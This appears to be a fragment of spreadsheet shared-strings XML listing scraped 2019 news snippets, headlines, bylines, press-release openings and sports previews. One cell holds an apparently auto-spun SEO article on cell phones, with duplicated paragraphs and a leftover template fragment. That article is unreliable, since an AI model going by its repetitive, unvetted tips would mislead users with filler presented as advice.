    <t>Basic English Belarusian dictionary. Covers the most used words and is ideal for students or businessman. Translate Text English Belarusian Dictionary – PDF Download Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>A Manitoba pumpkin patch that had its own share of struggles this season is giving 'thanks' on Monday in the form of a fundraiser.</t>
  </si>
  <si>
    <t>Hey @Nigel_Farage I saw you in the paper, something about unfinished business, certainly is isn't it? pic.twitter.com/fNKeMJdWNO — Jay #StopBrexit #FBPE (@jaypwright) October 13, 2019 from Twitter https://twitter.com/jaypwright</t>
  </si>
  <si>
    <t>To stay connected, you need a cell phone. It can be quite difficult to keep abreast of all the new innovations in cell phone technology. There are touch screens, Blue Tooth technology, and a bunch of other things that we need to know to use phones well. This article teaches you what you need to know about cell phones. Don’t watch video too much if you have an LTE or 4G signal. Your data allowance won’t be very high. Video eats up this allowance rapidly, and you could rack up additional charges if you exceed it. Try a new plan if you cannot stay within restrictions. Don’t decide your phone is broken just because you got it wet. The best thing you could do is to take the battery out and place your phone into a bowl that has dry rice. This helps you eliminate moisture from your device. Don’t always get the newest phone. You may simply be wasting your money. Phones are swapped out all the time, and every once in a while, the updates are nothing to write home about. Before buying a new phone, read the reviews for it to ensure it is truly necessary for you to make the upgrade. In many cases, you do not. When relying on an LTE or 4G signal, take care when you view video. Your cell phone’s plan may have an allowance for the data you’re using. Videos use up a lot of data, so you may have unexpected charges. If overages are a common occurrence for you, then you need to rethink your plan. If you have a smartphone, you most likely use it quite often throughout the day. Power your phone off on a regular basis. Computers and smartphones are alot alike. Restarting them can free up the memory and keep them running better. You’ll find a few shut downs really help. You dont want to keep upgrading every time a new phone comes out. It may be a waste of money. Cell phone companies change what phones they carry all the time, but sometimes the phone updates are very minor. Online reviews can help you decide if the newest model is right for you. Quite often, you really do not. Does your phone battery drain rapidly? Maybe your signal is weak. A weak signal places a significant drain on the battery. Don’t store your phone in areas without a signal unless you have turned it completely off. Smartphones become slower with time. If so, installing new apps and updates to your phone can become difficult. At this point, a choice will have to be made. You can keep the status quo, and refuse any new updates, or upgrade your phone to a newer version. Carefully consider purchasing an extended warranty. Usually, they aren’t worth the paper they’re printed on. A defective phone will generally fail within the time allotted for the regular warranty. Also, lots of folks get new phones ever year, so extended coverage is useless. Comparison shop at neighborhood stores before buying your new cell phone. Spend some time testing the features of a variety of models. This is your best bet for getting home with a phone you are bound to love using. Smartphones are not as fast when they get older. Make sure that you perform all of the necessary upgrades. Sooner or later, you will be required to make a decision. You can be stubborn and refuse updates, or upgrade the phone to newer versions. Recharge the battery on your phone before it completely dies out. Cell phones carry rechargeable batteries normally. Draining them completely reduces the amount of charge they can carry. Thus, see if you can charge the battery much earlier in the process. Don’t feel like you have to stick to one brand all the time. This will give you a better understanding on what you have at your fingertips. Looking at other brands of phones may show you a new range of functionality. With the newest models, a case will probably not be necessary. Smartphone designers take this into account when they are designing the phone. Although cases can protect what’s there, they can make it harder to use the cell phone. Think about what is out there, and decide what is right for you. Do not purchase smartphones if you just want to talk. While many people currently own smartphones, these people often go online or send emails using their phones. If you don’t plan on using your phone for these purposes, you can save a lot of money by opting for a non-smart phone. Remember that the camera on your phone does not use optical zooming. To get a true close-up, you must be near your subject. You can purchase lenses that do this also. Take some time to learn what the applications do that are on your phone. Most recent models of phones are capable of surfing the web and playing music. It will probably have a calender as well. You will get more for your money if you know how to use these various programs. Cell Phones Protect your phone. It can be costly to fix them. Get a screen protector for your phone. Then, look into getting a hard case, something that will keep the phone safe in the event that it slips from your fingers. Cell phones allow us to constantly be able to stay in touch with friends and family. This article has, hopefully, introduced some new ideas to you. You should now feel more comfortable when it comes to cell phones. Purchase a solid case to protect your phone. Dropping an iPhone is a very expensive mistake, for example. Otterbox cases are very protective and strong. They can prevent your phone from getting damaged. You may want to give some thought to buying the Defender. It’s important to be educated about things you are interested in. You must take the time to learn about betamax price comparison|. Use the tips you just read to help your experience be more successful.</t>
  </si>
  <si>
    <t>Philip G. Pavely-USA TODAY Sports Much to the chagrin of most, BTSC’s Nostradumbass predicts the Steelers’ West Coast trip vs the Chargers. Not to insult dumpster fires and train wrecks, but the Steelers are closing in on that distinction in 2019. Many more questions arose after the debilitating loss last week. With that being said, will James Conner ever get it going out of traditional sets? Can the offensive line open up holes for him? Who will star at quarterback and will Randy Fichtner have a game plan suiting his talents? Can JuJu strap this team to his back? Can the defense continue their dominant look from the week before? With these questions, story lines, and more, I’ve compiled a list of predictions (some basic, and some utterly idiotic) to look for in this prime time contest: Antonio Brown shows up to the game in full Steelers uniform attempting to join-in on pregame warmups. AB tells NBC’s Michelle Tafoya that just like the 1986 season of Dallas where Bobby Ewing wasn’t killed, he was merely in the shower…2019 was just a dream. It doesn’t work and AB is ushered off of the field. James Conner rushes 12 times for 40 yards on the afternoon. Nobody on the Steelers staff seem concerned about No. 30 and the line. JuJu Smith-Schuster scores the only offensive TD and celebrates the score and the birth anniversary of H.J. Heinz by turning long snapper Kam Canaday (No. 57) upside down, hitting him on his number and pretending to pour him on a giant burger. The Steelers struggle with Austin Ekeler and Melvin Gordon running the ball for nearly 200 yards combined. NBC’s Al Michael’s and Chris Collinsworth make mention of Phillip Rivers 8,000 children at least five times. Collinsworth says something mildly critical of the Steelers and the comment sections go crazy on how much he hates the Steelers. Even though his Jets play at 4:25 against Dallas and figuring that nobody will notice his absence, Le’Veon Bell flies to San Diego to perform his hip-hop version of Super Chargers. Not realizing that the team had relocated to Los Angeles, Bell wonders why the five-star UBER guy wants the equivalent of a week’s pay to get him to the game. Mike Hilton records another interception, while T.J. Watt gets a strip sack and a score. Devlin Hodges plays well enough for conflict to ensue with Mason Rudolph in the short term. The Steelers will lose to the Chargers 33-17 and finding themselves prepping for 2020. Will any of this actually happen? I’ll bet at least one or two. Heck, maybe every one of them. Be sure to post your predictions — basic or bizarre — below.</t>
  </si>
  <si>
    <t>The gold medal strategy that shaped the Oarsome Foursome will now be used to prepare the Fearsome Threesome of Australian fast bowling.</t>
  </si>
  <si>
    <t>Australians are effected by mental health in different ways.</t>
  </si>
  <si>
    <t>Richard Huckle gazes innocently at the camera in his year 4 class photo, smartly dressed in his blue school uniform with his shirt collar neatly turned over.</t>
  </si>
  <si>
    <t>Stephane Mailhiot takes over leadership of the agency as it retools its offering, while Alex Panousis becomes CEO of Havas Village. Read More</t>
  </si>
  <si>
    <t>JORDAN Oliver is “big into fishing and big into culture” so it was only a matter of time before he combined the two into a commercial opportunity.</t>
  </si>
  <si>
    <t>The former Melbourne school principal appeared before a Jerusalem court on Wednesday as the case to bring her to trial in Australia continues.</t>
  </si>
  <si>
    <t>As Richmond and Collingwood have proven recently, relationships are vital and it’s why an appointment of a ‘head of leadership and culture’ is a key step towards change at the Crows.</t>
  </si>
  <si>
    <t>Jockey Damian Lane believes Japanese import Mer De Glace profiles like a Caulfield Cup winner after taking the entire for a spin around Caulfield on Tuesday.</t>
  </si>
  <si>
    <t>🔔 Follow us for regular uploads: http://bit.ly/SubscribeToCircus 🎵 Buy / Stream: 🎧 Our latest releases on Spotify: http://bit.ly/CircusPlaylistSP 💽 Check out our Circus Mixtape playlist: http://bit.ly/CircusMixtapeYT ➡️ Follow Circus: Facebook: http://bit.ly/CircusFbook Instagram: http://bit.ly/CircusInstagram Twitter: http://bit.ly/CircusTwitter Soundcloud: http://bit.ly/CircusSoundcloud Beatport: http://bit.ly/CircusBeatport The post Big Voyage – Blue Ghost appeared first on Dubster.</t>
  </si>
  <si>
    <t>Thought this deserved its own deal. My Pet Warehouse has a Buy 1, Get 1 Free deal for Nature's Miracle Urine Destroyer 946ml. Free delivery on orders over $49. To redeem this offer please add products in multiples of two as you MUST include your FREE unit. When a 'mix &amp; match' is available, the lesser priced items will be discounted. Other buy 1, get 1 free deals: - Smart Naturals grain-free dog treats - Dingo Dog training treats 120 Pack</t>
  </si>
  <si>
    <t>Korean Telugu Hangman game – select either to guess the Korean or the Telugu word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading Korean Telugu Hangman →</t>
  </si>
  <si>
    <t>Expectations were low for Daniel Jones when he took over the role of starting quarterback for the New York Giants in week three. All he had to do was play better than how Eli Manning had been playing—and he has. After two starts, he is 2-0, the Giants are 2-2, and they are only one game back in the NFC East. Does this mean it is safe to go ahead and get excited about the Giants? Some would say yes; many more would say no. But depending on how Sunday’s game vs. the Minnesota Vikings plays out, that could change. The Line According to DraftKings, the Vikings (-215) are favored by five points over the Giants (+185). Oddsmakers see the game as a low scoring one, too, with the over/under set at 43.5 total points. Can Daniel Jones Remain Undefeated? Jones will face easily his toughest test to date in the Vikings defense. Minnesota ranks sixth in the league in total yards allowed (312.8 per game), are ninth against the pass (218.5 yards/game) and are tough against the run as well (tenth; 94.3 yards/game). While he has the offense playing well, even without Saquon Barkley in the backfield, Jones knows he has a real challenge on his hands this week (via ESPN): “They are a good unit, a good team. We’ll be prepared. I think when you look at them, they are a strong front seven and they are good in the back end, too. I think we’ll be ready.” The Vikings defense has 11 sacks on the year and three interceptions. But they have also allowed teams to complete 72.1 percent of their passes. For an accurate quarterback like Jones (he’s completed 69 percent of his passes), that could be the window the Giants need. If he can complete some passes and Golden Tate, Sterling Shephard, and Evan Engram can break a few tackles, the Giants could steal a win. Of course, their defense is going to need to keep the Vikings offense from getting on track. From a statistical perspective, that looks like something easier said than done. The Giants defense ranks towards the bottom of the league in total yards allowed and passing yards allowed. But their run defense hasn’t been too bad (19th in the league; 109.8 yards/game allowed). If the defense can slow Dalvin Cook down, they could force the Vikings to turn to Kirk Cousins. Since the Giants have the 25th ranked pass defense (279.5 yards/game allowed), that could be a bad thing. But with all of the issues the Vikings and Cousins have had in the passing game, they might be okay. Or it could be the reason the Vikings pass offense finally wakes up. The Prediction Look for the Vikings pass offense to show signs of life for the first time this season. Jones and the Giants will have a good day throwing the ball as well. If the Giants can create a running game as they did against Washington (five players combined for 37 carries and gained 164 yards and a touchdown), Daniel Jones will get his third win of the season. If they can’t, the Giants may still cover the spread.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/d2pn9TUcuIQ/300383-pocket-perfect-new-analogue-fpga-handheld-promises-flawless-retro-gaming Pocket Perfect: New Analogue FPGA Handheld Promises Flawless Retro Gaming If you pay attention to the retro gaming scene, chances are you’ve heard of Analogue. The company builds gorgeous, FPGA-powered retro gaming systems that exploit the unique capabilities of FPGA hardware to deliver virtually perfect emulation. We say “virtually,” because with any emulated system there’s the possibility that a game might not play properly, but using an FPGA allows Analogue to build perfect replicas of the early CPUs that these systems used. This, in turn, drastically reduces the chance of an error or bug. Now, Analogue has announced a new product — one that might fill the gap left in the hearts of retro gaming lovers who have been wishing someone would release a handheld classic edition of an iconic gaming system. The $199 Analogue Pocket is an FPGA-handheld that supports games from the Game Boy, Game Boy Color, and Game Boy Advance. Compatibility with other portable systems, including the Atari Lynx, Sega Game Gear, and Neo Geo Pocket Color is also planned, via cartridge adapters. The Pocket will feature a 3.5-inch screen with a 1600×1440 LTPS LCD (615 PPI, so those of you with 20/8 vision can enjoy Retina-class displays just like everybody else). That should be plenty for emulating a Game Boy, considering the Game Boy Advance had a 240×160 screen. The diminutive display doesn’t mean less horsepower, however — the Analogue Pocket will feature the same Altera Cyclone V FPGA that Analogue uses for its living room retro consoles like the Super Nt and Mega Sg. There will also be a Cyclone 10 FPGA to allow developers to do their own core development if they wish. The system will be available in two colors, black or white, and it has a microSD slot to allow for third-party extension. There’s also a nifty feature that nods to the Switch — an optional HDMI-equipped dock, for outputting games on a big-screen TV. Wired USB and Bluetooth controllers will both be supported (price not yet announced). The system also has stereo speakers and a 3.5mm output jack for undocked play or headphones. It has a lithium-ion battery (no word on battery life but it’s reportedly quite good) and an original-style link plug) if you want to play Tetris with a friend. The Pocket also comes with Nanoloop, a Game Boy chiptune electronic music program. It’ll be interesting to see if this new handheld convinces Nintendo or any of the other manufacturers that it might be worth investing in a Game Boy Classic. Nintendo seems to be virtually the only company that might take this on in a serious way, most of the other manufacturers who dabbled in the handheld market were driven out of it by Nintendo’s unstoppable Game Boy juggernaut in the 1990s and early 2000s. Sony could potentially field a combined PSP / Vita classic system, but after the low-quality PlayStation Classic and the general failure of Vita, the Japanese firm may have little interest in either idea. Now Read: Nvidia Launches Game Studio to Bring Ray Tracing to More Retro Titles Sony Shares Fresh Details on PlayStation 5, Will Launch Holidays 2020 Internet Archive Adds 2,500 Playable MS-DOS Games Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/d2pn9TUcuIQ/300383-pocket-perfect-new-analogue-fpga-handheld-promises-flawless-retro-gaming The post Pocket Perfect: New Analogue FPGA Handheld Promises Flawless Retro Gaming appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Jack Wighton was never going to get rid of the ball after Ben Cummins signalled six more tackles in the most talked about moment of the grand final.</t>
  </si>
  <si>
    <t>Kerri Sackville</t>
  </si>
  <si>
    <t>Forgiveness is a complex emotion: it's hard to know if it is really all about them ... or you.</t>
  </si>
  <si>
    <t>Seven people have been taken to hospital after a tram crash in Melbourne, Labor is pushing for the government to green light a new bank inquiry, and Bill Shorten shoulders the blame for the election loss. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Kansas City Federal Reserve Bank President Esther George on Sunday rejected the notion that the U.S. central bank should cut interest rates to try to boost low inflation, which she said is largely a result of global forces that U.S. monetary policy can do little to counter.</t>
  </si>
  <si>
    <t>Former girlfriends of the notorious Sydney “playboy rapist”, now out on parole, fear it’s only a matter of time before he strikes again.</t>
  </si>
  <si>
    <t>MOST couples pray for nice weather on their wedding day, but when the rains came down just after Georgina Mace and Tom Simson tied the knot at his family property near Bundella, southwest of Tamworth, nobody minded one little bit.</t>
  </si>
  <si>
    <t>Nothing like a little off-season contemplation to get a guy back to the top of the mountain. For Loucheiz Purifoy, once a rising star and then a fallen one, the view from his current perspective is once again spectacular, as he and his mates on the Saskatchewan Roughriders defence find their individual roles combining harmoniously to give the unit the momentum it needs heading into crunch time. “We’re in a real good groove and we’ve gotta just keep it goin’,” says the 26-year-old native of Florida, following his team’s practice ahead of Saturday’s biggie with the Winnipeg Blue Bombers. “We got animals everywhere, man.” RELATED » Weekly Predictor: Stamps are automatic after the bye » Ferguson: Who is the CFL’s best wide side passer? » Accuracy Grades: Who was on target in Week 16? Saskatchewan Roughriders defensive back Louchiez Purifoy celebrates with his teammates following an interception against the Winnipeg Blue Bombers (Arthur Ward/CFL.ca) Purifoy is one of those animals, growing into a leadership role that once might have been thought unattainable for him by some. After a spectacular two years with the B.C. Lions, where the native of Florida’s talents were made obvious at both the SAM and halfback positions, his career went “splat” when he signed with Ottawa as a free agent in 2018. Not even halfway through last season, Purifoy was released by the REDBLACKS, left wondering what he needed to do better, or just differently, in order to reclaim the career momentum that had just months before seemed unstoppable. “You never wanna get cut in the middle of the season,” he says, reflecting on his doomed tenure in Ottawa. “But at the end of the day, I got cut and I had to look at myself in the mirror and see what I was doing wrong.” Although he’d been quickly snapped up by the Roughriders after being released last August, Purifoy knew things weren’t quite right with him. Happy to have another chance to regain his positive career trajectory with Saskatchewan, and wanting to ensure he made the right steps in the future, he took stock when last season came to an end. “I did some soul searching,” Purifoy says of the last off-season, during which he signed a one-year extension with the Riders. “I had to figure out what it was I wanted to do. If you wanna play football, you gotta be a man and you gotta accept everything that comes with it.” In an all-star worthy campaign, Purifoy has made 44 defensive plays for the Riders, including three interceptions (tied for the team lead with SAM linebacker Derrick Moncrief) and a team-leading seven knockdowns. He’s contributed a couple of sacks as well, and a forced fumble. That’s not to mention his contributions on special teams, where Purifoy is one of the league leaders in kick returns, with 910 yards, including an 87-yarder for a touchdown. Purifoy, it may well be said, is a different man these days. His current teammates, linebacker Solomon Elimimian and safety Mike Edem have alluded to that, having seen him both now and then, as they were mates with the Lions as well, when Purifoy arrived on the scene in 2016. “They just look at me like now I’m a leader,” says Purifoy, when the views of those two teammates are brought up. “When I got to B.C. I was just a young rookie that just wanted to play ball. I really didn’t care what people said about me or this or that.” “Now, it’s different because I’m a leader on the defence. I’ve gotta communicate. I’ve probably got the most communication out of anybody on the field, ‘cause I gotta talk to the field corner and the SAM. So I had to take the next step, knowing my job and knowing theirs.” With his emotional adjustments in place, Purifoy has rebounded completely in 2019, anchored in at field half in a Saskatchewan defence that has been coming together in steady improvement week after week. The Riders’ D stands second in the CFL in net offence given up, at 293.5 yards per game. While the rush defence is in the middle of the pack, the pass defence ranks second, allowing 223.8 yards a game. Saskatchewan defenders have allowed the fewest touchdowns in the league (22) as well as the fewest first downs. Giving up an average of 5.7 yards per play, the Roughriders’ defence is tied with Edmonton’s for top spot in that category as well. Saskatchewan Roughriders Louchiez Purifoy sits on the bench with his teammates during the team’s game against the Toronto Argonauts (Shannon Vizniowski/CFL.ca) It’s a congealing unit, hardening into an increasingly difficult defence to play against. Part of it is personnel, to be sure. Part of it is veteran performance, with defensive lineman Charleston Hughes leading the league in sacks, with 15, and Elimimian resuming his usual place at the heart of a defence after missing the beginning of the season due to injury. Micah Johnson is upsetting plays from the middle of the defensive line and the more than reliable Ed Gainey helps pull together the secondary. To name a few. Part of it – an important part, says Purifoy – is improved communication. “To be honest, at the beginning of the year, we used to go at each other over busted plays,” he says. “Now, we get to the sidelines and we know how to talk to each other. We trust each other.” “We had to find a way to communicate with each other. The best way to work for everybody.” “That comes from our coaches,” Purifoy adds, crediting Head Coach Craig Dickenson, Defensive Coordinator Jason Shivers and the rest of the staff with adjusting attitudes early in the season. “They believe in us and we believe in them too.” There is another element at play here, when it comes to both Purifoy’s individual revival and that of the defence as a whole; consistency. When Purifoy joined the Riders last season, Saskatchewan’s defensive backs were more often flipped and flopped on the field in order to match-up with certain individuals on an opponent’s offence. This season, he says, the backs are slotted into a usual position most of the time, in spite of where an opponent’s receivers are lining up. So, Purifoy plays field half no matter what. That means he so often has Moncrief in front of him and rookie field corner L.J. McCray beside him, with Edem, of course, in the middle of the secondary. I did some soul searching. I had to figure out what it was I wanted to do. If you wanna play football, you gotta be a man and you gotta accept everything that comes with it. – Louchiez Purifoy With McCray grabbing the corner spot with both hands – “He listens, he takes coaching. He wants to learn,” says Purifoy of the converted college safety – the Saskatchewan secondary has had the luxury of consistency for most of 2019, allowing for Purifoy’s personal growth to come to the fore. And he’s embraced that. “For me, I just knew I had to take that step as a leader,” Purifoy says, echoing the soul-searching voices of the last off-season. “If I’m gonna play at field half, it’s a hard job. Probably got three different things to do on one play.” And if all that responsibility means he will face moments where a coach or teammate will constructively critique his performance from game to game or play to play, he’ll choose, he says, to park his ego. “I’d rather just listen and take in the information,” says Purifoy. “So I can know how to be a better leader for myself and this team.” Back on track, Loucheiz Purifoy is determined to keep his career on the rails this time.</t>
  </si>
  <si>
    <t>NEWS</t>
  </si>
  <si>
    <t>ReleaseWire - Latest Press Releases</t>
  </si>
  <si>
    <t>When it comes to skilled nursing for injured patients or elders with mobility difficulty, Professional Healthcare Resource is the company...</t>
  </si>
  <si>
    <t>Asian shares fell on Wednesday to a six-week trough, rattled by fresh trade war concerns following threats from President Donald Trump to...</t>
  </si>
  <si>
    <t>Now on Pre-Order: Learn the methods used by a digital mastermind to market (and grow) multi-million dollar businesses in the Forecaster...</t>
  </si>
  <si>
    <t>AB Newswire</t>
  </si>
  <si>
    <t>CapitalCityTickets.com carries a vast selection of Rob Zombie and Marilyn Manson concert tickets at affordable prices. Rob Zombie and...</t>
  </si>
  <si>
    <t>The Associated Press</t>
  </si>
  <si>
    <t>KANSAS CITY CHIEFS (13-5) OPEN CAMP: July 27, St. Joseph, Missouri LAST YEAR: First-year starter Patrick Mahomes shattered nearly every...</t>
  </si>
  <si>
    <t>MarketWatch</t>
  </si>
  <si>
    <t>The Chicago PMI fell sharply in July, falling to 44.4 from 49.7 in June, its lowest level since December 2015, according to MNI Indicators...</t>
  </si>
  <si>
    <t>Sen. Bernie Sanders came out swinging against the fossil-fuel industry on Tuesday night, suggesting at the Democratic presidential debate...</t>
  </si>
  <si>
    <t>By Press Association 2019</t>
  </si>
  <si>
    <t>Welsh actor Michael Sheen has been announced as the host of this year’s GQ Men Of The Year Awards ceremony. The Good Omens star will...</t>
  </si>
  <si>
    <t>CapitalCityTickets.com carries a vast selection of Brian Setzer’s Orchestra concert tickets at affordable prices. Brian Setzer’s Orchestra...</t>
  </si>
  <si>
    <t>GlobeNewswire News Releases</t>
  </si>
  <si>
    <t>MIAMI, July 25, 2019 (GLOBE NEWSWIRE) -- via OTC PR WIRE – Tiger Reef, Inc. (OTC: TGRR) (“Tiger Reef” or the “Company”), an emerging...</t>
  </si>
  <si>
    <t>He talks to Nirpal Dhaliwal</t>
  </si>
  <si>
    <t>Akshay Kumar is in relaxed, chatty mood when we meet in Kensington, London. Knowing that I am, like him, a Punjabi, the 51-yearold...</t>
  </si>
  <si>
    <t>MUSCATINE, Iowa (AP) _ HNI Corp. (HNI) on Wednesday reported second-quarter earnings of $15.8 million. The Muscatine, Iowa-based company...</t>
  </si>
  <si>
    <t>PR Newswire</t>
  </si>
  <si>
    <t>NEW YORK, July 30, 2019 /PRNewswire/ -- Global Cosmetic Ingredients Market: About this market Cosmetics ingredients comprise of natural,...</t>
  </si>
  <si>
    <t>SportsHeadlines News</t>
  </si>
  <si>
    <t>Share Colby Covington vs. Robbie Lawler, Do or Die for Eddie Alvarez, McGregor-Masvidal, and more Shaun and Chuck discuss Colby...</t>
  </si>
  <si>
    <t>WBOC TV 16 is Delmarva's number one source for breaking news, local news, weather, sports, education and traffic information. WBOC covers...</t>
  </si>
  <si>
    <t>FRESNO, Calif. (AP) — A former California Highway Patrol assistant chief and his estranged wife were sentenced to probation for helping...</t>
  </si>
  <si>
    <t>Confirmed Line-Ups Your @realmadriden XI for the fit towards @SpursOfficial!#HalaMadrid p.c.twitter.com/4GQ68JlJHV - Real Madrid C.F....</t>
  </si>
  <si>
    <t>The analysts forecast the global argon gas market to exhibit a CAGR of 4.65% during the period 2019-2024. The report covers the present...</t>
  </si>
  <si>
    <t>OAK ISLAND, N.C. A woman says her husband was killed on the North Carolina coast when a wave crashed into him, slamming his head into the...</t>
  </si>
  <si>
    <t>By The Associated Press</t>
  </si>
  <si>
    <t>A look at what's happening around the majors Tuesday: STILL A MET (FOR NOW) Mets right-hander Noah Syndergaard (7-5, 4.33) is set to start...</t>
  </si>
  <si>
    <t>by Jack Evans</t>
  </si>
  <si>
    <t>12:45pm: QUEENSLAND Ambulance services had been tasked to attend the Capricornia Corrections Centre following a possible assault which...</t>
  </si>
  <si>
    <t>By RONALD BLUM</t>
  </si>
  <si>
    <t>PHILADELPHIA Police say that one person has been killed and five others wounded as they prepared to shoot a music video in a Philadelphia...</t>
  </si>
  <si>
    <t>ST. LOUIS (AP) — Authorities say a 16-year-old has been arrested in the shooting death of a 14-year-old boy during a gathering with other...</t>
  </si>
  <si>
    <t>Authored by Ray McGovern via ConsortiumNews.com, Three years ago Monday WikiLeaks published a trove of highly embarrassing emails that had...</t>
  </si>
  <si>
    <t>FORT LAUDERDALE, Fla. (AP) — Four months after the country's largest auto dealership chain named a new chief executive to replace its...</t>
  </si>
  <si>
    <t>Wall Street's main indexes were set to open lower on Tuesday, as worries about the scale of consensus at the Federal Reserve in favor of...</t>
  </si>
  <si>
    <t>Residents of Musselburgh in East Lothian have saddled up for a historic event held as part of the town festival. The Riding of the Marches...</t>
  </si>
  <si>
    <t>Dublin, July 26, 2019 (GLOBE NEWSWIRE) -- The "Global Macrocell Baseband Unit Market Analysis and Forecast, 2019-2023, 15th Edition"...</t>
  </si>
  <si>
    <t>NewMediaWire</t>
  </si>
  <si>
    <t>CHICAGO, IL - (NewMediaWire) - July 24, 2019 - CannaTrac® Technology, Inc. (“the Company”), the leading cashless payment solution for the...</t>
  </si>
  <si>
    <t>GREGORY KATZ and NATASHA LIVINGSTONE Associated Press</t>
  </si>
  <si>
    <t>LONDON (AP) — Here are five things you may not know about Boris Johnson, who is set to become Britain's next prime minister : HE HASN'T...</t>
  </si>
  <si>
    <t>Shares of General Electric Co. turned lower Wednesday, erasing earlier sharp gains, as the industrial conglomerate’s earnings and free cash...</t>
  </si>
  <si>
    <t>Syndication Cloud</t>
  </si>
  <si>
    <t>Originally posted on https://www.catchlightpainting.com/the-curse-of-cleanliness/ One of the tasks we take very seriously when we are...</t>
  </si>
  <si>
    <t>There is just one month left to complain to firms about PPI mis-selling as the deadline looms nearer. Consumers have until August 29 2019...</t>
  </si>
  <si>
    <t>Chris McLennan</t>
  </si>
  <si>
    <t>Landlords want to introduce a new pet bond across the Northern Territory. This new bond should be as high as $300 for those tenants wanting...</t>
  </si>
  <si>
    <t>Casino giant Crown has hit back at claims of dodgy dealings including money-laundering and instead says it's facing a "deceitful campaign"....</t>
  </si>
  <si>
    <t>0 comment A Brexit Party bus has been towed after it was pictured empty with its doors open on the side of a road in Wales. After...</t>
  </si>
  <si>
    <t>Former High Court judge Ian Callinan says the AAT needs better funding and more lawyers appointed. The Administrative Appeals Tribunal...</t>
  </si>
  <si>
    <t>Richard Stewart</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.09 in Q1 2019. Its down 0.27, from 1.36 in 2018Q4. It turned negative, as 19 investors sold Ascena...</t>
  </si>
  <si>
    <t>In line with its goal of helping fitness enthusiasts across the globe build the new way to wear sports suit and fitness apparel as a whole,...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 /PRNewswire/ -- Ecommerce sales represented over 50% of all retail growth in 2018 and the growing customer...</t>
  </si>
  <si>
    <t>Zak Maoui</t>
  </si>
  <si>
    <t>Attending Comic-Con this weekend both Taron Egerton and Cole Sprouse opted for low-cut necks...</t>
  </si>
  <si>
    <t>by News Staff</t>
  </si>
  <si>
    <t>CAIRO — Libya’s national oil company says it has suspended operations at the country’s largest oil field following the closure of a...</t>
  </si>
  <si>
    <t>SOURCE Hormel Foods Corporation AUSTIN, Minn., July 23, 2019 /PRNewswire/ -- The makers of Hormel® Compleats® microwave meals announced...</t>
  </si>
  <si>
    <t>Cristina Abellan Matamoros</t>
  </si>
  <si>
    <t>On Monday, the French Navy found the wreckage of the Minerve submarine, which disappeared off the coast of Toulon in the Mediterranean Sea...</t>
  </si>
  <si>
    <t>Health officials in the US state of Florida have issued a warning in regards to the discovery of a mosquito-borne virus which causes mind...</t>
  </si>
  <si>
    <t>By Ad Crable</t>
  </si>
  <si>
    <t>More than 1,000 fish to be released in a Susquehanna tributary this fall</t>
  </si>
  <si>
    <t>PRLog</t>
  </si>
  <si>
    <t>VANCOUVER, British Columbia - July 23, 2019 - PRLog -- The University of British Columbia and the University of California, Berkeley will...</t>
  </si>
  <si>
    <t>By JULIE WATSON and ELLIOT SPAGAT Associated Press</t>
  </si>
  <si>
    <t>SAN DIEGO (AP) — Newly released search warrants give the clearest indication yet that the New Zealand attacks on mosques inspired a San...</t>
  </si>
  <si>
    <t>This report covers market characteristics, size and growth, segmentation, regional breakdowns, competitive landscape, market shares, trends...</t>
  </si>
  <si>
    <t>At least three people have been killed and at least 13 more injured after a gunman opened fire at at a garlic festival in...</t>
  </si>
  <si>
    <t>North Korea has fired several unidentified projectiles off its east coast, according to South Korea’s military. Observers say the launches...</t>
  </si>
  <si>
    <t>Business Wire</t>
  </si>
  <si>
    <t>Blaine McPeak Named CEO and Greg Christenson Named CFO EDMONTON, Alberta — Champion Petfoods, maker of the award-winning ORIJEN and ACANA...</t>
  </si>
  <si>
    <t>Throughout the first half of the 20th century, the working week gradually got shorter and shorter. As technological advances powered...</t>
  </si>
  <si>
    <t>PEACHTREE CORNERS, Ga. --(BUSINESS WIRE) FLEETCOR Technologies, Inc. (NYSE: FLT), today announced that the Company will host a conference...</t>
  </si>
  <si>
    <t>Nerves of Steel: How I Followed My Dreams, Earned My Wings, And Faced My Greatest Challenge (ISBN# 9780785228318) is a personal chronicle...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 31, 2019 /PRNewswire/ -- Pegasus Investments Real Estate Advisory Inc. ("Pegasus Investments") is pleased to announce the...</t>
  </si>
  <si>
    <t>Newsbot</t>
  </si>
  <si>
    <t>This is a companion discussion topic for the original entry at...</t>
  </si>
  <si>
    <t>BY THE ASSOCIATED PRESS</t>
  </si>
  <si>
    <t>A photograph of three University of Mississippi students posing with guns beside a bullet-pocked and oft-vandalized historic marker to...</t>
  </si>
  <si>
    <t>Jeremy Corbyn has snubbed the boss of fracking firm Cuadrilla, meeting protesters instead at the gates of a shale gas exploration site and...</t>
  </si>
  <si>
    <t>HONG KONG (AP) — The Latest on protests in Hong Kong (all times local): 5:45 p.m. Hong Kong police have fired tear gas at protesters who...</t>
  </si>
  <si>
    <t>3BL Media: Corporate Social Responsibility, Energy and Health News</t>
  </si>
  <si>
    <t>SOURCE: Consumers Energy JACKSON, Mich., July 31, 2019 /3BL Media/ – The Consumers Energy Foundation is highlighting its commitment to...</t>
  </si>
  <si>
    <t>CANBERRA, Australia — Australia is set to pass laws that would allow the government to prevent suspected extremists from returning home for...</t>
  </si>
  <si>
    <t>Share on FacebookShare on TwitterShare on LinkedinShare on PinterestShare on XingShare on Reddit Who else is psyched?...</t>
  </si>
  <si>
    <t>Register - Forgot Password By creating an account, you verify that you are at least 13 years of age, and have read and agree to the...</t>
  </si>
  <si>
    <t>DENVER, July 22, 2019 /PRNewswire/ -- DaVita Inc. (NYSE: DVA) ("DaVita" or "Company"), today announced preliminary second quarter 2019...</t>
  </si>
  <si>
    <t>by Adam Carlson 6 minutes ago Follow @MNVikingZombie</t>
  </si>
  <si>
    <t>Director Zack Snyder is returning to the zombie genre with Army of the Dead on Netflix and he has tapped a Fear the Walking Dead star for...</t>
  </si>
  <si>
    <t>Business Wire News Releases</t>
  </si>
  <si>
